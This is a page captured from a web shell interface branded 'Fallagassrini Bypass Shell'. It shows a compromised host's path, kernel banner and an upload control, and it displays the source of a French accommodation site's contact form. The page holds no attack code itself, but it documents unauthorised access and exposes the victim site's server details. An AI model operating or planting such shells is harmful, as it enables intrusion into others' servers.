Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/find.myreco.online/v2/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/find.myreco.online/v2/contact.php

<?
include("configuration.php");
?>
<!doctype html>
<html lang="fr">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Find Myreco — Contact</title>
  <link rel="shortcut icon" href="img/icone.png" />
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
  <link rel="stylesheet" href="css/style_halt.css?v=<?= filemtime(__DIR__.'/css/style_halt.css') ?>">
  <link rel="stylesheet" href="css/neige.css">
  <script src="js/neige.js"></script>

  <link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.4/dist/leaflet.css">
  <script src="https://unpkg.com/leaflet@1.9.4/dist/leaflet.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/js/bootstrap.min.js"></script>
  <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>

  <style>
  .btn-active{
  background: var(--accent);
  color: #fff !important;
  border: none;
  box-shadow: 0 6px 14px rgba(43,148,220,.25);
}
.btn-active:hover{
  filter: brightness(0.95);background: #5ca8c4;
}
    .form-shell{
	  width: 100%;
	  background: #ffffff;
	  border: 1px solid rgba(0,0,0,.08);
	  border-radius: 28px;
	  box-shadow: var(--shadow2);
	  padding: 24px;
	}

    .form-title{
      margin: 0 0 8px 0;
      font-size: 34px;
      line-height: 1.1;
      letter-spacing: -0.03em;
      font-weight: 800;
      color: var(--text);
    }

    .form-subtitle{
      margin: 0 0 22px 0;
      color: var(--muted);
      font-size: 15px;
      line-height: 1.6;
      max-width: 720px;
    }

    .sub-block{
      background: linear-gradient(180deg,#ffffff 0%, #e9f4fb 100%);
      border: 1px solid rgba(0,0,0,.08);
      border-radius: 22px;
      padding: 20px;
      margin-bottom: 18px;
    }

    .sub-title{
      margin: 0 0 16px 0;
      font-size: 20px;
      font-weight: 800;
      color: var(--text);
    }

    .form-grid{
      display: grid;
      grid-template-columns: 1fr 1fr;
      gap: 14px;
    }

    .form-field{
      display: flex;
      flex-direction: column;
      gap: 8px;
    }

    .form-field.full{
      grid-column: 1 / -1;
    }

    .form-field label{
      font-size: 14px;
      font-weight: 700;
      color: var(--text);
    }

    .form-field input,
    .form-field select,
    .form-field textarea{
      width: 100%;
      border: 1px solid rgba(0,0,0,.12);
      border-radius: 14px;
      padding: 14px 16px;
      font-size: 15px;
      color: var(--text);
      background: #fff;
      outline: none;
      transition: border-color .15s ease, box-shadow .15s ease;
      font-family: inherit;
    }

    .form-field input,
    .form-field select{
      min-height: 52px;
    }

    .form-field textarea{
      min-height: 160px;
      resize: vertical;
    }

    .form-field input:focus,
    .form-field select:focus,
    .form-field textarea:focus{
      border-color: var(--accent);
      box-shadow: 0 0 0 4px rgba(43,148,220,.14);
    }

    .form-actions{
      margin-top: 22px;
      display: flex;
      justify-content: flex-end;
    }

    .form-cta{
      border: none;
      border-radius: 999px;
      background: #2b94dc;
      color: #ffffff;
      padding: 14px 26px;
      font-size: 17px;
      font-weight: 700;
      cursor: pointer;
      box-shadow: 0 10px 22px rgba(43,148,220,.20);
    }

    .form-cta:hover{
      filter: brightness(.98);
    }

    @media (max-width: 760px){
      .form-shell{
        padding: 18px;
      }

      .form-title{
        font-size: 28px;
      }

      .form-grid{
        grid-template-columns: 1fr;
      }
    }
  </style>
</head>

<body>
  <div class="page-bg">
    <div class="topbar">
      <div class="container py-3">
        <div class="d-flex align-items-center justify-content-between gap-3">
          <a href="https://find.myreco.online/" class="brand-link d-flex align-items-center gap-2">
            <span class="brand-mark"></span>
            <span class="brand-text">
              <span class="brand-a">Find.</span><span class="brand-b">MyReco</span>
            </span>
          </a>

          <div class="d-none d-md-flex align-items-center gap-2">
            <div class="nav-pill small"><i class="bi bi-lightning-charge me-1"></i>Rapide</div>
            <div class="nav-pill small"><i class="bi bi-shield-check me-1"></i>Sécurisé</div>
            <a href="referencement.php" class="btn  btn-sm btn-ghost"><i class="bi bi-person-circle me-1"></i>Demande de référencement</a>
			<a href="contact.php" class="btn btn-active btn-sm btn-ghost"><i class="bi bi-envelope me-1"></i>Contact</a>
          </div>
        </div>
      </div>
    </div>

    <section class="hero">
      <div class="container">
        <div class="row align-items-center g-4">
          <div class="col-lg-7">
            <h1 class="display-5 fw-bold mb-3">
              Une question sur Find ? <br><span style="color:var(--accent)">Contactez-nous simplement.</span>
            </h1>
          </div>

          <div class="col-lg-5 d-none d-lg-block">
            <div class="p-3" style="border-radius: var(--radius); background: #fff; border: 1px solid rgba(0,0,0,.08); box-shadow: var(--shadow2);">
              <div class="d-flex align-items-start justify-content-between">
                <div>
                  <div class="small" style="color:var(--muted)">Find vous mets en relation directe</div>
				  <div class="small" style="color:var(--muted)">avec <b>185 000 Propriétaires d'hébergements touristiques.</b></div>
                </div>
              </div>

              <div class="mt-3 small">
                 <span class="badge-soft">Appartement</span>
                <span class="badge-soft">Maison</span>
                <span class="badge-soft">Gîte</span>
                <span class="badge-soft">Chambre d'hôte</span>
                <span class="badge-soft">Hôtel</span>
                <span class="badge-soft">Camping</span>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>

    <br>

    <section class="pb-4">
      <div class="container">

        <form class="form-shell" method="post" action="traitement_contact.php">
          <h2 class="form-title">Une question, une remarque sur Find ?</h2>
          <p class="form-subtitle">
            Utilisez ce formulaire pour nous contacter. Nous vous répondrons rapidement.
          </p>

          <div class="sub-block">
            <h3 class="sub-title">Vos coordonnées</h3>
            <div class="form-grid">
              <div class="form-field">
                <label for="nom">Votre nom</label>
                <input type="text" id="nom" name="nom" placeholder="Ex. Camille Martin" required>
              </div>

              <div class="form-field">
                <label for="email">Votre email</label>
                <input type="email" id="email" name="email" placeholder="Ex. camille@email.com" required>
              </div>
            </div>
          </div>

          <div class="sub-block">
            <h3 class="sub-title">Votre message</h3>
            <div class="form-grid">
              <div class="form-field full">
                <label for="sujet">Sujet</label>
                <select id="sujet" name="sujet" required>
                  <option value="">Sélectionnez un sujet</option>
                  <option value="Demande d'information">Demande d'information</option>
                  <option value="Problème technique">Problème technique</option>
                  <option value="Autre">Autre</option>
                </select>
              </div>

              <div class="form-field full">
                <label for="message">Votre message</label>
                <textarea id="message" name="message" placeholder="Décrivez votre question ou votre remarque..." required></textarea>
              </div>
            </div>
          </div>
		  <div class="cf-turnstile"
			 data-sitekey="<?= TURNSTILE_SITE_KEY ?>"
			 data-size="invisible">
		</div>

          <div class="form-actions">
            <button type="submit" class="form-cta">Envoyer</button>
          </div>
        </form>

        <footer class="mt-5 py-4">
          <div class="d-flex flex-column flex-md-row justify-content-between gap-2">
            <div>© Myreco — 2025</div>
            <div class="small">Halt • Applications</div>
          </div>
        </footer>

        <button class="btn btn-ghost" style="display:none;" id="btnClear">
          <i class="bi bi-x-lg me-1"></i>Reset
        </button>
      </div>
    </section>
  </div>

  <script src="js/script_halt.js?v=<?= filemtime(__DIR__.'/js/script_halt.js') ?>"></script>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net